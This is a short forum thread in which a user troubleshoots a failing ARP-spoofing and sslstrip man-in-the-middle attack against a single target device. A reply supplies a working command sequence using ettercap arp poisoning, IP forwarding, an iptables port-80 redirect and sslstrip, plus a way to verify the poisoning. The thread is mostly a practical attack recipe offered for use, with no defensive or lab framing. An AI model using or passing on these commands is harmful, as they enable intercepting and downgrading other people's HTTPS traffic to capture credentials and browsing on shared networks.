Hi, so I've been trying to use sslstrip/arpspoof on this laptop and I've been extremely unsuccessful. I'll list everything I've done in the order that I do it:

echo 1 >/proc/sys/net/ipv4/ip_forwad
iptables -t nat -A PREROUTING -p tcp --destination-port -80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t *.*.*.* *.*.*.* (target then gateway, yes I've made sure they're both right)
arpspoof -i wlan0 -t *.*.*.* *.*.*.* (gateway then target, I've tried doing it with this and without it)
sslstrip -k -l 8080 -w /root/Desktop/sslstrip.log

And the log file always comes out empty. My target is an individual device, not multiple. After creating the iptable rule if I type iptables -t nat --list it comes up. Any advice? I also tried ettercap and that wasn't working either. After arpspoofing and the device is used the urls are still https.

Thanks!

Hi

- try to use anoter Port (10000)
To show if arpspoof works open on the Client CMD or shell an type "arp -a" the gateway an the attacker should have the same MAC-Adress after the arpspoof attack...

or the better way ist to use ettercap for arp-spoof... shell or GUI..

for example:

- ettercap -T -q -i wlan6 F -M arp:remote // /192.168.1.1/ -P autoadd
- echo 1 >> /proc/sys/net/ipv4/ip_forward
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
- sslstrip -l 10000

a other way is to use mitmproxy give a look here http://vimeo.com/114373690

the same work in a network with ettercap arp spoofing.

ozzy

p.s not all switch are vunerable for arp-spoofing... google an read way..